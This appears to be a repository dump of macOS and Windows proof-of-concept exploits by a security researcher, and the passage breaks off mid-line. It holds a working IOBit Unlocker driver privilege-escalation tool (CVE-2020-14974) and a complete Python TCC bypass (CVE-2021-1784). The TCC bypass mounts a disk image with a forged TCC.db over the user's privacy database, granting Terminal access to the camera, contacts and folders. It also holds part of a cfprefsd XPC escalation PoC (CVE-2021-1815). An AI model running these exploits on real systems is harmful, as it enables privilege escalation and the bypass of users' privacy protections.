}, 38 | { 39 | "idiom" : "mac", 40 | "size" : "256x256", 41 | "scale" : "2x" 42 | }, 43 | { 44 | "idiom" : "mac", 45 | "size" : "512x512", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "mac", 50 | "size" : "512x512", 51 | "scale" : 
"2x" 52 | } 53 | ], 54 | "info" : { 55 | "version" : 1, 56 | "author" : "xcode" 57 | } 58 | } -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "version" : 1, 4 | "author" : "xcode" 5 | } 6 | } -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 
| 567 | Right to Left 568 | 569 | 570 | 571 | 572 | 573 | 574 | 575 | 576 | 577 | 578 | 579 | 580 | 581 | 582 | 583 | 584 | 585 | 586 | 587 | 588 | 589 | 590 | 591 | 592 | 593 | 594 | 595 | 596 | 597 | 598 | 599 | 600 | 601 | 602 | 603 | 604 | 605 | 606 | 607 | 608 | 609 | 610 | 611 | 612 | 613 | 614 | 615 | 616 | 617 | 618 | 619 | 620 | 621 | 622 | 623 | 624 | 625 | 626 | 627 | 628 | 629 | 630 | 631 | 632 | 633 | 634 | 635 | 636 | 637 | 638 | 639 | 640 | 641 | 642 | 643 | 644 | 645 | 646 | 647 | 648 | 649 | 650 | 651 | 652 | 653 | 654 | 655 | 656 | 657 | 658 | 659 | 660 | 661 | 662 | 663 | 664 | 665 | 666 | 667 | 668 | 669 | 670 | 671 | 672 | 673 | 674 | 675 | 676 | 677 | 678 | 679 | 680 | 681 | 682 | 683 | 684 | 685 | 686 | 687 | 688 | 689 | 690 | 691 | 692 | 693 | 694 | 695 | 696 | 697 | 698 | 699 | 700 | 701 | 702 | 703 | 704 | 705 | 706 | 707 | 708 | 709 | 710 | 711 | 712 | 713 | 714 | 715 | 716 | 717 | 718 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIconFile 10 | 11 | CFBundleIdentifier 12 | $(PRODUCT_BUNDLE_IDENTIFIER) 13 | CFBundleInfoDictionaryVersion 14 | 6.0 15 | CFBundleName 16 | $(PRODUCT_NAME) 17 | CFBundlePackageType 18 | $(PRODUCT_BUNDLE_PACKAGE_TYPE) 19 | CFBundleShortVersionString 20 | 1.0 21 | CFBundleVersion 22 | 1 23 | LSMinimumSystemVersion 24 | $(MACOSX_DEPLOYMENT_TARGET) 25 | NSHumanReadableCopyright 26 | Copyright © 2019. csaba. All rights reserved. 
27 | NSMainStoryboardFile 28 | Main 29 | NSPrincipalClass 30 | NSApplication 31 | NSSupportsAutomaticTermination 32 | 33 | NSSupportsSuddenTermination 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/PMCocoa.entitlements: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // PMCocoa 4 | // 5 | // Created by csaby on 2019. 12. 15.. 6 | // Copyright © 2019. csaba. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : NSViewController 12 | 13 | 14 | @end 15 | 16 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // PMCocoa 4 | // 5 | // Created by csaby on 2019. 12. 15.. 6 | // Copyright © 2019. csaba. All rights reserved. 7 | // 8 | 9 | #import "ViewController.h" 10 | 11 | @implementation ViewController 12 | 13 | - (void)viewDidLoad { 14 | [super viewDidLoad]; 15 | 16 | // Do any additional setup after loading the view. 17 | } 18 | 19 | 20 | - (void)setRepresentedObject:(id)representedObject { 21 | [super setRepresentedObject:representedObject]; 22 | 23 | // Update the view, if already loaded. 
24 | } 25 | 26 | 27 | @end 28 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // PMCocoa 4 | // 5 | // Created by csaby on 2019. 12. 15.. 6 | // Copyright © 2019. csaba. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | int main(int argc, const char * argv[]) { 12 | @autoreleasepool { 13 | // Setup code that might create autoreleased objects goes here. 14 | } 15 | return NSApplicationMain(argc, argv); 16 | } 17 | -------------------------------------------------------------------------------- /cve-2020-14974_iobit_unlocker/UnlockExploit/UnlockExploit.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29009.5 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "UnlockExploit", "UnlockExploit\UnlockExploit.vcxproj", "{BB74308A-2903-44D0-9BA9-D4459E4883DA}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {BB74308A-2903-44D0-9BA9-D4459E4883DA}.Debug|x64.ActiveCfg = Debug|x64 17 | {BB74308A-2903-44D0-9BA9-D4459E4883DA}.Debug|x64.Build.0 = Debug|x64 18 | {BB74308A-2903-44D0-9BA9-D4459E4883DA}.Debug|x86.ActiveCfg = Debug|Win32 19 | {BB74308A-2903-44D0-9BA9-D4459E4883DA}.Debug|x86.Build.0 = Debug|Win32 20 | {BB74308A-2903-44D0-9BA9-D4459E4883DA}.Release|x64.ActiveCfg = Release|x64 21 | {BB74308A-2903-44D0-9BA9-D4459E4883DA}.Release|x64.Build.0 = Release|x64 22 | 
{BB74308A-2903-44D0-9BA9-D4459E4883DA}.Release|x86.ActiveCfg = Release|Win32 23 | {BB74308A-2903-44D0-9BA9-D4459E4883DA}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {7E679E64-9B49-49C5-AF2C-64CC15BF1663} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /cve-2020-14974_iobit_unlocker/UnlockExploit/UnlockExploit/UnlockExploit.cpp: -------------------------------------------------------------------------------- 1 | // UnlockExploit.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | BOOL FileExists(LPCWSTR szPath) 9 | { 10 | DWORD dwAttrib = GetFileAttributesW(szPath); 11 | printf("[i] File exists status: 0x%08x\n", dwAttrib); 12 | return (dwAttrib != INVALID_FILE_ATTRIBUTES); 13 | } 14 | 15 | void ReadStringFromSTDIN(wchar_t * buffer) 16 | { 17 | printf("> "); 18 | fgetws((wchar_t*)buffer, 0x200, stdin); 19 | memset((LPVOID)((SIZE_T)buffer + (lstrlenW((LPCWSTR)buffer) * sizeof(WCHAR) - sizeof(WCHAR))), 0x00, sizeof(WCHAR)); //remove end of line character 20 | } 21 | 22 | int main(int argc, char* argv[]) { 23 | printf("[i] IOBit Unlocker Privilege Escalation PoC\n"); 24 | 25 | //open the driver 26 | HANDLE hDriver = CreateFileW(L"\\\\.\\IOBitUnlockerDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); 27 | if (hDriver != INVALID_HANDLE_VALUE) 28 | { 29 | printf("[+] opened handle to the driver\n"); 30 | 31 | DWORD input_buffer_size = 0x1000; 32 | DWORD output_buffer_size = 0x1000; 33 | //allocate input buffer 34 | LPVOID input_buffer = VirtualAlloc(NULL, (SIZE_T)input_buffer_size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 35 | if (input_buffer == NULL) 36 | { 37 | printf("[-] Unable 
to allocate memory for input buffer\n"); 38 | ExitProcess(-1); 39 | } 40 | printf("[+] Allocated input memory buffer at: 0x%Ix\n", (UINT64)input_buffer); 41 | 42 | //allocate output buffer 43 | LPVOID output_buffer = VirtualAlloc(NULL, (SIZE_T)output_buffer_size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 44 | if (output_buffer == NULL) 45 | { 46 | printf("[-] Unable to allocate memory for output buffer\n"); 47 | ExitProcess(-1); 48 | } 49 | printf("[+] Allocated output buffer memory at: 0x%Ix\n", (UINT64)output_buffer); 50 | 51 | // Clear memory area 52 | memset(input_buffer, 0x00, input_buffer_size); 53 | memset(output_buffer, 0x00, output_buffer_size); 54 | 55 | printf("[i] Enter full path for the file to unlock. Eg: C:\\Windows\\System32\\cmd.exe\n"); 56 | ReadStringFromSTDIN((wchar_t*)input_buffer); 57 | wprintf(L"Fileto be checked: %s\n", (wchar_t *)input_buffer); 58 | 59 | if (!FileExists((LPCWSTR)input_buffer)) { 60 | printf("[-] This file doesn't exists\n"); 61 | ExitProcess(-1); 62 | } 63 | //print options 64 | printf("[+] File found!\n"); 65 | printf("[i] Choose an option:\n"); 66 | printf("1 - INFO\n"); 67 | printf("2 - Unlock\n"); 68 | printf("3 - Unlock & Delete\n"); 69 | printf("4 - Unlock & Rename\n"); 70 | printf("5 - Unlock & Move\n"); 71 | printf("6 - Unlock & Copy\n"); 72 | 73 | boolean valid = false; 74 | int option = 0; 75 | while (!valid) 76 | { 77 | printf("> "); 78 | int result = scanf_s("%d", &option); 79 | if (result == EOF) { 80 | printf("[-] Invalid input\n"); 81 | continue; 82 | } 83 | if (result == 0) { 84 | while (fgetc(stdin) != '\n') // Read until a newline is found 85 | ; 86 | printf("[-] Invalid input\n"); 87 | continue; 88 | } 89 | 90 | if (option > 0 && option < 7) 91 | { 92 | valid = true; 93 | while (fgetc(stdin) != '\n') // Read until a newline is found, if we don't do this it will mess up code later 94 | ; 95 | } 96 | else 97 | { 98 | printf("[-] Invalid number, enter something between 1 and 6\n"); 99 | } 100 | } 
101 | 102 | DWORD dwIoctl_info = 0x222128; 103 | DWORD dwIoctl_action = 0x222124; 104 | DWORD dwBytesOut = 0; 105 | switch (option) 106 | { 107 | case 1: 108 | { 109 | DeviceIoControl(hDriver, dwIoctl_info, input_buffer, input_buffer_size, output_buffer, output_buffer_size, &dwBytesOut, NULL); 110 | wprintf(L"[i] File info: %s\n", (wchar_t*)output_buffer); 111 | break; 112 | } 113 | case 2: 114 | { 115 | ((byte*)input_buffer)[0x424] = 0x3; 116 | DeviceIoControl(hDriver, dwIoctl_action, input_buffer, input_buffer_size, output_buffer, output_buffer_size, &dwBytesOut, NULL); 117 | break; 118 | } 119 | case 3: 120 | { 121 | ((byte*)input_buffer)[0x420] = 0x1; 122 | ((byte*)input_buffer)[0x424] = 0x3; 123 | DeviceIoControl(hDriver, dwIoctl_action, input_buffer, input_buffer_size, output_buffer, output_buffer_size, &dwBytesOut, NULL); 124 | break; 125 | } 126 | case 4: //this is not working id the user doesn't have rights to access the file 127 | { 128 | ((byte*)input_buffer)[0x420] = 0x2; 129 | ((byte*)input_buffer)[0x424] = 0x3; 130 | printf("[i] Enter new filename:\n"); 131 | ReadStringFromSTDIN((wchar_t*)((SIZE_T)input_buffer + 0x210)); 132 | DeviceIoControl(hDriver, dwIoctl_action, input_buffer, input_buffer_size, output_buffer, output_buffer_size, &dwBytesOut, NULL); 133 | break; 134 | } 135 | case 5: 136 | { 137 | ((byte*)input_buffer)[0x420] = 0x3; 138 | ((byte*)input_buffer)[0x424] = 0x3; 139 | printf("[i] Enter new path (move operation):\n"); 140 | ReadStringFromSTDIN((wchar_t*)((SIZE_T)input_buffer + 0x210)); 141 | DeviceIoControl(hDriver, dwIoctl_action, input_buffer, input_buffer_size, output_buffer, output_buffer_size, &dwBytesOut, NULL); 142 | break; 143 | } 144 | case 6: 145 | { 146 | ((byte*)input_buffer)[0x420] = 0x4; 147 | ((byte*)input_buffer)[0x424] = 0x3; 148 | printf("[i] Enter new path (copy operation):\n"); 149 | ReadStringFromSTDIN((wchar_t*)((SIZE_T)input_buffer + 0x210)); 150 | DeviceIoControl(hDriver, dwIoctl_action, input_buffer, 
input_buffer_size, output_buffer, output_buffer_size, &dwBytesOut, NULL); 151 | break; 152 | } 153 | default: 154 | break; 155 | } 156 | } 157 | else { 158 | printf("[-] Couldn't open the driver\n"); 159 | ExitProcess(-1); 160 | } 161 | CloseHandle(hDriver); 162 | ExitProcess(0); 163 | } 164 | 165 | 166 | -------------------------------------------------------------------------------- /cve-2020-14974_iobit_unlocker/UnlockExploit/UnlockExploit/UnlockExploit.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | {BB74308A-2903-44D0-9BA9-D4459E4883DA} 24 | Win32Proj 25 | UnlockExploit 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | Disabled 91 | true 92 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 93 | true 94 | 95 | 96 | Console 97 | true 98 | 99 | 100 | 101 | 102 | 103 | 104 | Level3 105 | Disabled 106 | true 107 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 108 | true 109 | 110 | 111 | Console 112 | true 113 | 114 | 115 | 116 | 117 | 118 | 119 | Level3 120 | MaxSpeed 121 | true 122 | true 123 | true 124 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 125 | true 126 | 127 | 128 | Console 129 | true 130 | true 131 | true 132 | 133 | 134 | 135 | 136 | 137 | 138 | Level3 139 | MaxSpeed 140 | true 141 | true 142 | true 143 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 144 | true 145 | 146 | 147 | Console 148 | true 149 | true 150 | true 
151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | -------------------------------------------------------------------------------- /cve-2020-14974_iobit_unlocker/UnlockExploit/UnlockExploit/UnlockExploit.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /cve-2020-14974_iobit_unlocker/UnlockExploit/UnlockExploit/UnlockExploit.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /cve-2020-14974_iobit_unlocker/UnlockExploit/x64/Release/UnlockExploit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/theevilbit/exploits/2f5293f84c20b5813f9b253c883b5fc6e6989a5b/cve-2020-14974_iobit_unlocker/UnlockExploit/x64/Release/UnlockExploit.exe -------------------------------------------------------------------------------- /cve-2021-1784_tcc_bypass_hdiutil/cve-2021-1784_tcc_bypass_hdiutil.mov: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/theevilbit/exploits/2f5293f84c20b5813f9b253c883b5fc6e6989a5b/cve-2021-1784_tcc_bypass_hdiutil/cve-2021-1784_tcc_bypass_hdiutil.mov -------------------------------------------------------------------------------- /cve-2021-1784_tcc_bypass_hdiutil/tccbypass.py: -------------------------------------------------------------------------------- 1 | import os 2 | 
# Text dump (sqlite3 ".dump" format) of a replacement per-user TCC database.
# The six tables (admin, policies, active_policy, access_overrides, expired,
# access) are the schema; the `access` rows are the payload.  Each row pairs a
# TCC service name (kTCCService...) with a client, given either as a bundle
# id ('com.apple.Terminal', client_type 0) or as a path
# ('/usr/bin/osascript', client_type 1).  The fourth value of every row,
# auth_value, is 2 throughout.
# NOTE(review): 2 is presumably the "allowed" state and the X'fade0c00...'
# blobs in the csreq column are presumably code-signing requirements that
# pin the row to the client's signature -- confirm both against the TCC
# schema (admin.version is 19 here) before relying on this reading.
tcc_dump = """
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE admin (key TEXT PRIMARY KEY NOT NULL, value INTEGER NOT NULL);
INSERT INTO admin VALUES('version',19);
CREATE TABLE policies ( id INTEGER NOT NULL PRIMARY KEY, bundle_id TEXT NOT NULL, uuid TEXT NOT NULL, display TEXT NOT NULL, UNIQUE (bundle_id, uuid));
CREATE TABLE active_policy ( client TEXT NOT NULL, client_type INTEGER NOT NULL, policy_id INTEGER NOT NULL, PRIMARY KEY (client, client_type), FOREIGN KEY (policy_id) REFERENCES policies(id) ON DELETE CASCADE ON UPDATE CASCADE);
CREATE TABLE access_overrides ( service TEXT NOT NULL PRIMARY KEY);
CREATE TABLE expired ( service TEXT NOT NULL, client TEXT NOT NULL, client_type INTEGER NOT NULL, csreq BLOB, last_modified INTEGER NOT NULL , expired_at INTEGER NOT NULL DEFAULT (CAST(strftime('%s','now') AS INTEGER)), PRIMARY KEY (service, client, client_type));
CREATE TABLE IF NOT EXISTS "access" ( service TEXT NOT NULL, client TEXT NOT NULL, client_type INTEGER NOT NULL, auth_value INTEGER NOT NULL, auth_reason INTEGER NOT NULL, auth_version INTEGER NOT NULL, csreq BLOB, policy_id INTEGER, indirect_object_identifier_type INTEGER, indirect_object_identifier TEXT NOT NULL DEFAULT 'UNUSED', indirect_object_code_identity BLOB, flags INTEGER, last_modified INTEGER NOT NULL DEFAULT (CAST(strftime('%s','now') AS INTEGER)), PRIMARY KEY (service, client, client_type, indirect_object_identifier), FOREIGN KEY (policy_id) REFERENCES policies(id) ON DELETE CASCADE ON UPDATE CASCADE);
INSERT INTO access VALUES('kTCCServiceSystemPolicyDownloadsFolder','/usr/bin/osascript',1,2,0,1,X'fade0c000000003000000001000000060000000200000013636f6d2e6170706c652e6f73617363726970740000000003',NULL,NULL,'UNUSED',NULL,NULL,1570821926);
INSERT INTO access VALUES('kTCCServiceSystemPolicyDocumentsFolder','com.apple.Terminal',0,2,0,1,X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',NULL,NULL,'UNUSED',NULL,0,1578822650);
INSERT INTO access VALUES('kTCCServicePhotos','com.apple.Terminal',0,2,0,1,NULL,NULL,NULL,'UNUSED',NULL,0,1579641459);
INSERT INTO access VALUES('kTCCServiceSystemPolicyNetworkVolumes','com.apple.Terminal',0,2,0,1,X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',NULL,NULL,'UNUSED',NULL,NULL,1585236401);
INSERT INTO access VALUES('kTCCServiceSystemPolicyRemovableVolumes','com.apple.Terminal',0,2,0,1,X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',NULL,NULL,'UNUSED',NULL,NULL,1585236548);
INSERT INTO access VALUES('kTCCServiceSystemPolicyDownloadsFolder','com.apple.Terminal',0,2,0,1,X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',NULL,NULL,'UNUSED',NULL,NULL,1590157084);
INSERT INTO access VALUES('kTCCServiceCamera','com.apple.Terminal',0,2,0,1,X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',NULL,NULL,'UNUSED',NULL,NULL,1590158855);
INSERT INTO access VALUES('kTCCServiceLiverpool','com.apple.Terminal',0,2,0,1,X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',NULL,NULL,'UNUSED',NULL,0,1602916689);
INSERT INTO access VALUES('kTCCServiceAddressBook','com.apple.Terminal',0,2,4,1,NULL,NULL,0,'UNUSED',NULL,0,1606073969);
INSERT INTO access VALUES('kTCCServiceCalendar','com.apple.Terminal',0,2,4,1,NULL,NULL,0,'UNUSED',NULL,0,1606073972);
INSERT INTO access VALUES('kTCCServiceReminders','com.apple.Terminal',0,2,4,1,NULL,NULL,0,'UNUSED',NULL,0,1606073976);
INSERT INTO access VALUES('kTCCServiceSystemPolicyDesktopFolder','com.apple.Terminal',0,2,4,1,NULL,NULL,0,'UNUSED',NULL,0,1606771281);
INSERT INTO access VALUES('kTCCServiceAppleEvents','/usr/bin/osascript',1,2,4,1,X'fade0c000000003000000001000000060000000200000013636f6d2e6170706c652e6f73617363726970740000000003',NULL,0,'com.apple.finder',X'fade0c000000002c00000001000000060000000200000010636f6d2e6170706c652e66696e64657200000003',0,1606772849);
INSERT INTO access VALUES('kTCCServiceAppleEvents','com.apple.Terminal',0,2,3,1,X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',NULL,0,'com.apple.finder',X'fade0c000000002c00000001000000060000000200000010636f6d2e6170706c652e66696e64657200000003',NULL,1606772944);
CREATE INDEX active_policy_id ON active_policy(policy_id);
COMMIT;
"""


def create_tcc_db() -> None:
    """Write `tcc_dump` to /tmp/tccdump.sql and load it into /tmp/TCC.db via sqlite3.

    Both paths are fixed names under the shared /tmp directory, and the exit
    status of the sqlite3 command is never checked, so a failed or partial
    import is not detected here; later steps simply copy whatever exists.
    """
    f = open('/tmp/tccdump.sql','w')
    f.write(tcc_dump)
    f.close()
    os.system("sqlite3 /tmp/TCC.db < /tmp/tccdump.sql")


def create_dmg() -> None:
    """Build a 2 MB APFS disk image at /tmp/tmp.dmg that contains the forged TCC.db.

    The image is attached once at /tmp/mnt (ownership disabled with
    -owners off) just long enough to copy /tmp/TCC.db in, then detached.
    Every os.system() return value is ignored, including the mkdir, so a
    pre-existing /tmp/mnt or a failed attach is carried forward silently.
    """
    os.system("hdiutil create /tmp/tmp.dmg -size 2m -ov -volname \"tccbypass\" -fs APFS 1>/dev/null")
    os.system("mkdir /tmp/mnt")
    os.system("hdiutil attach -owners off -mountpoint /tmp/mnt /tmp/tmp.dmg 1>/dev/null")
    os.system("cp /tmp/TCC.db /tmp/mnt/TCC.db")
    os.system("hdiutil detach /tmp/mnt 1>/dev/null")


def mount_trick() -> None:
    """Attach the prepared image on top of the per-user TCC directory.

    The mountpoint is the *relative* path Library/Application Support/com.apple.TCC,
    so the image only lands on the user's TCC directory when the script is run
    with the home directory as the working directory.  Mounting a user-controlled
    volume over that directory is the core of the issue this PoC is filed under
    (CVE-2021-1784, from the directory name); the daemon restart in restart_tcc()
    is what makes tccd pick the forged database up afterwards.
    NOTE(review): -owners off presumably makes the volume's files appear owned
    by the mounting user -- confirm against hdiutil(1) before drawing
    conclusions about why the mount is accepted.
    """
    os.system("hdiutil attach -owners off -mountpoint Library/Application\ Support/com.apple.TCC /tmp/tmp.dmg 1>/dev/null")


def restart_tcc() -> None:
    """Stop and start com.apple.tccd through launchctl so the daemon reopens its database.

    The `&&` means the start only runs if the stop succeeded; neither result is
    reported to the caller.
    """
    os.system("launchctl stop com.apple.tccd && launchctl start com.apple.tccd")


def main() -> None:
    """Run the four steps in the only order that works: build DB, image it, mount, restart.

    Each step depends on the artifacts of the previous one (/tmp/TCC.db,
    /tmp/tmp.dmg, the mounted volume).  From a defender's side the observable
    events are the hdiutil attach with a mountpoint ending in
    Application Support/com.apple.TCC and the launchctl stop of com.apple.tccd;
    nothing here is privileged, so the whole sequence runs as the current user.
    """
    print("[i] Creating new TCC database")
    create_tcc_db()
    print("[i] Creating and prepare DMG file")
    create_dmg()
    print("[i] Mount DMG over com.apple.TCC")
    mount_trick()
    print("[i] Restart TCC")
    restart_tcc()
    print("[i] Enjoy access :-)")


# Runs unconditionally at import time: there is no __main__ guard.
main()
-------------------------------------------------------------------------------- /cve-2021-1815_macos_cfprefsd_lpe/prefs.m: -------------------------------------------------------------------------------- 1 | #import 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | int main() { 16 | //CFPreferencesSetAppValue(@"Label", @"You know what should be put here", [(id)NSHomeDirectory() stringByAppendingPathComponent:@"Library/LaunchAgents/evil.plist"]); 17 | 18 | //char *serviceName = "com.apple.cfprefsd.agent"; 19 | char *serviceName = "com.apple.cfprefsd.daemon"; 20 | int status = 0; 21 | 22 | xpc_connection_t conn; 23 | xpc_object_t msg; 24 | 25 | conn = xpc_connection_create_mach_service(serviceName, NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED); 26 | if (conn == NULL) { 27 | perror("xpc_connection_create_mach_service"); 28 | } 29 | 30 | xpc_connection_set_event_handler(conn, ^(xpc_object_t obj) { 31 | perror("xpc_connection_set_event_handler"); 32 | }); 33 | 34 | xpc_connection_resume(conn); 35 | 36 | msg = xpc_dictionary_create(NULL, NULL, 0); 37 | xpc_dictionary_set_int64(msg, "CFPreferencesOperation", 1); 38 | xpc_dictionary_set_bool(msg, "CFPreferencesUseCorrectOwner", true); 39 | 40 | //create as root 41 | //xpc_dictionary_set_string(msg, "CFPreferencesUser", "root"); 42 | 43 | //create as user 44 | xpc_dictionary_set_string(msg, "CFPreferencesUser", "kCFPreferencesCurrentUser"); 45 | 46 | xpc_dictionary_set_string(msg, "CFPreferencesHostBundleIdentifier", "prefs"); 47 | //char writable_subpath[0x1000]; 48 | //sprintf(writable_subpath, "%s", "/usr/local/etc/periodic/daily/a.plist"); 49 | xpc_dictionary_set_string(msg, "CFPreferencesDomain", "/usr/local/etc/periodic/daily/a.plist"); 50 | //xpc_dictionary_set_bool(msg, "CFPreferencesAvoidCache", true); 51 | xpc_dictionary_set_string(msg, "Key", "key"); 52 | xpc_dictionary_set_string(msg, "Value", 
